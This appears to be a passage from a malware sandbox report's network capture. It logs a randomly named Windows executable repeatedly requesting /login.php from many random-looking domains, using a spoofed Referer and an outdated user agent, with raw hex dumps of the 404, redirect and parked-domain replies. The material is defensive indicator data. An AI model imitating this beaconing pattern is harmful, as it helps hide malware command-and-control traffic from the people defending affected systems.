                                                                                                                                                                                                            Nov 11, 2024 18:08:27.792011976 CET1236INData Raw: 7a 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74
                                                                                                                                                                                                            Data Ascii: z.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://galyqaz.com/sk-logabpstat
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.796853065 CET940INData Raw: 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 31 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61
                                                                                                                                                                                                            Data Ascii: ,url("http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2") format("woff2"),url("http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf") format("truetype"),url("http://i1.cdn-image.co


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            50192.168.2.9626053.94.10.34801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.179245949 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lymyxid.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.605165958 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344905|1731344858|23|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            51192.168.2.96260844.221.84.105801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.184389114 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.608155966 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            52192.168.2.962604188.114.96.3801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.275260925 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.868352890 CET974INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iN56%2F2EOCHGI23m8cTq3VzSuE8RMzBbQagbD5JJkJjWlhDBctm%2Flvc09DX1lE%2Fiq7YHKRfSBXNfjfxjnmeiCFpa72xbo74%2FgI3PEdFy%2FcwLmUvri6mfeXHDqHL6%2F0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe25bbd9e1784-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            53192.168.2.96260723.253.46.64801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.275335073 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.633725882 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:20 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.633759975 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            54192.168.2.96260675.2.71.199801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.275480032 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.606368065 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            55192.168.2.962609154.212.231.82801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.354177952 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.239357948 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:26 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.640160084 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.991812944 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            56192.168.2.962610208.100.26.245801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.389173031 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.837728024 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.640512943 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.744774103 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            57192.168.2.962611199.59.243.227801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.401827097 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.828382015 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: 0ceb1ece-1079-48fc-a3c5-5e5212a4886c
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65; expires=Mon, 11 Nov 2024 17:23:25 GMT
